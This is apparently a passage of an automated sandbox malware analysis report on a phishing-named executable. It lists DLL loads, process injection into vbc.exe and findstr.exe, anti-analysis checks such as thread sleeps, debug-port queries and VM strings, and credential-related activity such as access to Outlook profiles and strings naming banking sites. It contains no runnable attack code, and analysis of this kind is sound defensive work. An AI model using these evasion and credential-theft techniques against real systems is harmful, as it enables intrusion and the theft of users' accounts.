            Source: C:\Windows\SysWOW64\findstr.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\Payment Form+Inquiry LIST.exe Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\Payment Form+Inquiry LIST.exe Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\Payment Form+Inquiry LIST.exe Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\Payment Form+Inquiry LIST.exe Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\Payment Form+Inquiry LIST.exe Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\findstr.exe Section loaded: wininet.dll
            Source: C:\Windows\SysWOW64\findstr.exe Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\findstr.exe Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\findstr.exe Section loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\findstr.exe Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\findstr.exe Section loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\findstr.exe Section loaded: version.dll
            Source: C:\Windows\SysWOW64\findstr.exe Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\findstr.exe Section loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\findstr.exe Section loaded: wkscli.dll
            Source: C:\Windows\SysWOW64\findstr.exe Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\findstr.exe Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\findstr.exe Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\findstr.exe Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\findstr.exe Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\findstr.exe Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\findstr.exe Section loaded: mlang.dll
            Source: C:\Windows\SysWOW64\findstr.exe Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\findstr.exe Section loaded: winsqlite3.dll
            Source: C:\Windows\SysWOW64\findstr.exe Section loaded: vaultcli.dll
            Source: C:\Windows\SysWOW64\findstr.exe Section loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\findstr.exe Section loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\findstr.exe Section loaded: cryptbase.dll
            Source: C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe Section loaded: wininet.dll
            Source: C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe Section loaded: mswsock.dll
            Source: C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe Section loaded: dnsapi.dll
            Source: C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe Section loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe Section loaded: rasadhlp.dll
            Source: C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe Section loaded: fwpuclnt.dll
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\findstr.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: Payment Form+Inquiry LIST.exeStatic PE information: Image base 0x140000000 > 0x60000000
            Source: Payment Form+Inquiry LIST.exeStatic file information: File size 1950720 > 1048576
            Source: Payment Form+Inquiry LIST.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: Payment Form+Inquiry LIST.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: Payment Form+Inquiry LIST.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: Payment Form+Inquiry LIST.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Payment Form+Inquiry LIST.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: Payment Form+Inquiry LIST.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: Payment Form+Inquiry LIST.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
            Source: Binary string: findstr.pdbGCTL source: vbc.exe, 00000003.00000002.1580505880.00000000009E8000.00000004.00000020.00020000.00000000.sdmp, QYzBgoBGBcxProZWs.exe, 00000005.00000002.3786167586.00000000014CE000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: Unexpected node type! Please add aupport for any new parse tree nodes to the AutoParseTreeVisitor class!VB$AnonymousDelegateVB$StateMachinemscorpe.dllCreateICeeFileGenCreateICeeFileGenDestroyICeeFileGenDestroyICeeFileGen%ld.Myalink.dllCreateALinkCreateALinkComImport_VtblGap As Integer.pdbCLSID_CorSymWriter&%s.sdatavector<T> too longS?~ source: findstr.exe, 00000007.00000002.3790938279.0000000002BB3000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3792132594.000000000367C000.00000004.10000000.00040000.00000000.sdmp, QYzBgoBGBcxProZWs.exe, 00000009.00000002.3791022059.00000000032CC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.1922034773.000000002F70C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: QYzBgoBGBcxProZWs.exe, 00000005.00000000.1504924676.00000000006CE000.00000002.00000001.01000000.00000005.sdmp, QYzBgoBGBcxProZWs.exe, 00000009.00000002.3782981021.00000000006CE000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: findstr.pdb source: vbc.exe, 00000003.00000002.1580505880.00000000009E8000.00000004.00000020.00020000.00000000.sdmp, QYzBgoBGBcxProZWs.exe, 00000005.00000002.3786167586.00000000014CE000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdbUGP source: vbc.exe, 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3791579066.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, 00000007.00000003.1580674162.0000000002BB0000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000007.00000003.1582748260.0000000002D60000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3791579066.00000000030AE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, findstr.exe, 00000007.00000002.3791579066.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, 00000007.00000003.1580674162.0000000002BB0000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000007.00000003.1582748260.0000000002D60000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3791579066.00000000030AE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: vbc.pdb source: findstr.exe, 00000007.00000002.3790938279.0000000002BB3000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3792132594.000000000367C000.00000004.10000000.00040000.00000000.sdmp, QYzBgoBGBcxProZWs.exe, 00000009.00000002.3791022059.00000000032CC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.1922034773.000000002F70C000.00000004.80000000.00040000.00000000.sdmp
            Source: Payment Form+Inquiry LIST.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: Payment Form+Inquiry LIST.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: Payment Form+Inquiry LIST.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: Payment Form+Inquiry LIST.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: Payment Form+Inquiry LIST.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: Payment Form+Inquiry LIST.exeStatic PE information: section name: .managed
            Source: Payment Form+Inquiry LIST.exeStatic PE information: section name: hydrated
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_004017BF push ds; iretd 3_2_00401B30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0040A8C2 push ss; iretd 3_2_0040A921
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0041A881 push esp; iretd 3_2_0041A882
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0041E8B7 push ss; ret 3_2_0041E8BD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_004051A1 push ebp; ret 3_2_004051A2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_004019BF push ds; iretd 3_2_00401B30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_00401B31 push ds; iretd 3_2_00401B30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_00403500 push eax; ret 3_2_00403502
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0041CD8C push edx; iretd 3_2_0041CD8D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_00407643 pushfd ; iretd 3_2_0040765A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_00407638 pushfd ; iretd 3_2_0040765A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0041A763 push esi; iretd 3_2_0041A767
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051609AD push ecx; mov dword ptr [esp], ecx3_2_051609B6
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F1225F pushad ; ret 7_2_02F127F9
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F11344 push eax; iretd 7_2_02F11369
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F1B008 push es; iretd 7_2_02F1B009
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F127FA pushad ; ret 7_2_02F127F9
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F1283D push eax; iretd 7_2_02F12858
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F409AD push ecx; mov dword ptr [esp], ecx7_2_02F409B6
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F19939 push es; iretd 7_2_02F19940
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_006E20DD push cs; ret 7_2_006E20DE
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_006C4140 pushfd ; iretd 7_2_006C4157
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_006C4135 pushfd ; iretd 7_2_006C4157
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_006D711C push esi; iretd 7_2_006D7264
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_006D7260 push esi; iretd 7_2_006D7264
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_006D7247 push esi; iretd 7_2_006D7264
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_006D737E push esp; iretd 7_2_006D737F
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_006C73BF push ss; iretd 7_2_006C741E
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_006DB3B4 push ss; ret 7_2_006DB3BA
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_006D9889 push edx; iretd 7_2_006D988A
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_006E0BB3 push cs; ret 7_2_006E0BB4
            Source: C:\Windows\SysWOW64\findstr.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Windows\SysWOW64\findstr.exeAPI/Special instruction interceptor: Address: 7FF90818D324
            Source: C:\Windows\SysWOW64\findstr.exeAPI/Special instruction interceptor: Address: 7FF90818D944
            Source: C:\Windows\SysWOW64\findstr.exeAPI/Special instruction interceptor: Address: 7FF90818D504
            Source: C:\Windows\SysWOW64\findstr.exeAPI/Special instruction interceptor: Address: 7FF90818D544
            Source: C:\Windows\SysWOW64\findstr.exeAPI/Special instruction interceptor: Address: 7FF90818D1E4
            Source: C:\Windows\SysWOW64\findstr.exeAPI/Special instruction interceptor: Address: 7FF908190154
            Source: C:\Windows\SysWOW64\findstr.exeAPI/Special instruction interceptor: Address: 7FF90818DA44
            Source: C:\Users\user\Desktop\Payment Form+Inquiry LIST.exe Memory allocated: 2261D500000 memory reserve | memory write watch
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 3_2_051DD1C0 rdtsc 3_2_051DD1C0
            Source: C:\Windows\SysWOW64\findstr.exe Window / User API: threadDelayed 4092
            Source: C:\Windows\SysWOW64\findstr.exe Window / User API: threadDelayed 5881
            Source: C:\Users\user\Desktop\Payment Form+Inquiry LIST.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-16136
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe API coverage: 0.8 %
            Source: C:\Windows\SysWOW64\findstr.exe API coverage: 2.7 %
            Source: C:\Windows\SysWOW64\findstr.exe TID: 8012 Thread sleep count: 4092 > 30
            Source: C:\Windows\SysWOW64\findstr.exe TID: 8012 Thread sleep time: -8184000s >= -30000s
            Source: C:\Windows\SysWOW64\findstr.exe TID: 8012 Thread sleep count: 5881 > 30
            Source: C:\Windows\SysWOW64\findstr.exe TID: 8012 Thread sleep time: -11762000s >= -30000s
            Source: C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe TID: 8048 Thread sleep time: -75000s >= -30000s
            Source: C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe TID: 8048 Thread sleep time: -34000s >= -30000s
            Source: C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe TID: 8048 Thread sleep time: -31500s >= -30000s
            Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
            Source: C:\Windows\SysWOW64\findstr.exe Last function: Thread delayed
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_006DBF10 FindFirstFileW,FindNextFileW,FindClose,7_2_006DBF10
            Source: C:\Users\user\Desktop\Payment Form+Inquiry LIST.exeCode function: 0_2_00007FF6E8262760 GetSystemInfo,GetNumaHighestNodeNumber,GetCurrentProcess,GetProcessGroupAffinity,GetLastError,GetCurrentProcess,GetProcessAffinityMask,0_2_00007FF6E8262760
            Source: H0840I45.7.drBinary or memory string: dev.azure.comVMware20,11696497155j
            Source: H0840I45.7.drBinary or memory string: global block list test formVMware20,11696497155
            Source: H0840I45.7.drBinary or memory string: turbotax.intuit.comVMware20,11696497155t
            Source: findstr.exe, 00000007.00000002.3794278730.0000000007B94000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s.office.comVMware20,11696497155o
            Source: H0840I45.7.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
            Source: Payment Form+Inquiry LIST.exeBinary or memory string: qEMutating a value collection derived from a dictionary is not allowed.Y
            Source: findstr.exe, 00000007.00000002.3794278730.0000000007B94000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: teractivebrokers.co.inVMware20,11696497155d
            Source: findstr.exe, 00000007.00000002.3794278730.0000000007B94000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rdVMware20,11696497155
            Source: findstr.exe, 00000007.00000002.3794278730.0000000007B94000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: zure.comVMware20,11696497155j
            Source: H0840I45.7.drBinary or memory string: Interactive Brokers - HKVMware20,11696497155]
            Source: QYzBgoBGBcxProZWs.exe, 00000009.00000002.3785992619.00000000011BF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlll
            Source: H0840I45.7.drBinary or memory string: secure.bankofamerica.comVMware20,11696497155|UE
            Source: H0840I45.7.drBinary or memory string: tasks.office.comVMware20,11696497155o
            Source: H0840I45.7.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155
            Source: findstr.exe, 00000007.00000002.3794278730.0000000007B94000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware20,11696497155~
            Source: H0840I45.7.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
            Source: H0840I45.7.drBinary or memory string: bankofamerica.comVMware20,11696497155x
            Source: H0840I45.7.drBinary or memory string: ms.portal.azure.comVMware20,11696497155
            Source: H0840I45.7.drBinary or memory string: trackpan.utiitsl.comVMware20,11696497155h
            Source: findstr.exe, 00000007.00000002.3785973000.0000000002ABE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Process information queried: ProcessInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Process queried: DebugPort
            Source: C:\Windows\SysWOW64\findstr.exe Process queried: DebugPort
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 3_2_051DD1C0 rdtsc
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 3_2_00417A33 LdrLoadDll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0515F7BA mov eax, dword ptr fs:[00000030h]3_2_0515F7BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051EF7AF mov eax, dword ptr fs:[00000030h]3_2_051EF7AF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051EF7AF mov eax, dword ptr fs:[00000030h]3_2_051EF7AF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051EF7AF mov eax, dword ptr fs:[00000030h]3_2_051EF7AF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051EF7AF mov eax, dword ptr fs:[00000030h]3_2_051EF7AF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051EF7AF mov eax, dword ptr fs:[00000030h]3_2_051EF7AF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051E97A9 mov eax, dword ptr fs:[00000030h]3_2_051E97A9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051607AF mov eax, dword ptr fs:[00000030h]3_2_051607AF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0516C7C0 mov eax, dword ptr fs:[00000030h]3_2_0516C7C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051657C0 mov eax, dword ptr fs:[00000030h]3_2_051657C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051657C0 mov eax, dword ptr fs:[00000030h]3_2_051657C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051657C0 mov eax, dword ptr fs:[00000030h]3_2_051657C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051E07C3 mov eax, dword ptr fs:[00000030h]3_2_051E07C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051647FB mov eax, dword ptr fs:[00000030h]3_2_051647FB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051647FB mov eax, dword ptr fs:[00000030h]3_2_051647FB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051827ED mov eax, dword ptr fs:[00000030h]3_2_051827ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051827ED mov eax, dword ptr fs:[00000030h]3_2_051827ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051827ED mov eax, dword ptr fs:[00000030h]3_2_051827ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0516D7E0 mov ecx, dword ptr fs:[00000030h]3_2_0516D7E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05163616 mov eax, dword ptr fs:[00000030h]3_2_05163616
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05163616 mov eax, dword ptr fs:[00000030h]3_2_05163616
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051A2619 mov eax, dword ptr fs:[00000030h]3_2_051A2619
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051DE609 mov eax, dword ptr fs:[00000030h]3_2_051DE609
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05235636 mov eax, dword ptr fs:[00000030h]3_2_05235636
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0519F603 mov eax, dword ptr fs:[00000030h]3_2_0519F603
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0517260B mov eax, dword ptr fs:[00000030h]3_2_0517260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0517260B mov eax, dword ptr fs:[00000030h]3_2_0517260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0517260B mov eax, dword ptr fs:[00000030h]3_2_0517260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0517260B mov eax, dword ptr fs:[00000030h]3_2_0517260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0517260B mov eax, dword ptr fs:[00000030h]3_2_0517260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0517260B mov eax, dword ptr fs:[00000030h]3_2_0517260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0517260B mov eax, dword ptr fs:[00000030h]3_2_0517260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05191607 mov eax, dword ptr fs:[00000030h]3_2_05191607
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0517E627 mov eax, dword ptr fs:[00000030h]3_2_0517E627
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0515F626 mov eax, dword ptr fs:[00000030h]3_2_0515F626
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0515F626 mov eax, dword ptr fs:[00000030h]3_2_0515F626
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0515F626 mov eax, dword ptr fs:[00000030h]3_2_0515F626
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0515F626 mov eax, dword ptr fs:[00000030h]3_2_0515F626
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0515F626 mov eax, dword ptr fs:[00000030h]3_2_0515F626
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0515F626 mov eax, dword ptr fs:[00000030h]3_2_0515F626
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0515F626 mov eax, dword ptr fs:[00000030h]3_2_0515F626
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0515F626 mov eax, dword ptr fs:[00000030h]3_2_0515F626
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0515F626 mov eax, dword ptr fs:[00000030h]3_2_0515F626
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05196620 mov eax, dword ptr fs:[00000030h]3_2_05196620
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05198620 mov eax, dword ptr fs:[00000030h]3_2_05198620
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0516262C mov eax, dword ptr fs:[00000030h]3_2_0516262C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0522866E mov eax, dword ptr fs:[00000030h]3_2_0522866E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0522866E mov eax, dword ptr fs:[00000030h]3_2_0522866E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0517C640 mov eax, dword ptr fs:[00000030h]3_2_0517C640
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05192674 mov eax, dword ptr fs:[00000030h]3_2_05192674
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0519A660 mov eax, dword ptr fs:[00000030h]3_2_0519A660
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0519A660 mov eax, dword ptr fs:[00000030h]3_2_0519A660
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05199660 mov eax, dword ptr fs:[00000030h]3_2_05199660
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05199660 mov eax, dword ptr fs:[00000030h]3_2_05199660
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05164690 mov eax, dword ptr fs:[00000030h]3_2_05164690
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_05164690 mov eax, dword ptr fs:[00000030h]3_2_05164690
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051E368C mov eax, dword ptr fs:[00000030h]3_2_051E368C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051E368C mov eax, dword ptr fs:[00000030h]3_2_051E368C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051E368C mov eax, dword ptr fs:[00000030h]3_2_051E368C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051E368C mov eax, dword ptr fs:[00000030h]3_2_051E368C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051576B2 mov eax, dword ptr fs:[00000030h]3_2_051576B2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051576B2 mov eax, dword ptr fs:[00000030h]3_2_051576B2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051576B2 mov eax, dword ptr fs:[00000030h]3_2_051576B2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051966B0 mov eax, dword ptr fs:[00000030h]3_2_051966B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0515D6AA mov eax, dword ptr fs:[00000030h]3_2_0515D6AA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0515D6AA mov eax, dword ptr fs:[00000030h]3_2_0515D6AA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0519C6A6 mov eax, dword ptr fs:[00000030h]3_2_0519C6A6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0521D6F0 mov eax, dword ptr fs:[00000030h]3_2_0521D6F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0516B6C0 mov eax, dword ptr fs:[00000030h]3_2_0516B6C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0516B6C0 mov eax, dword ptr fs:[00000030h]3_2_0516B6C0
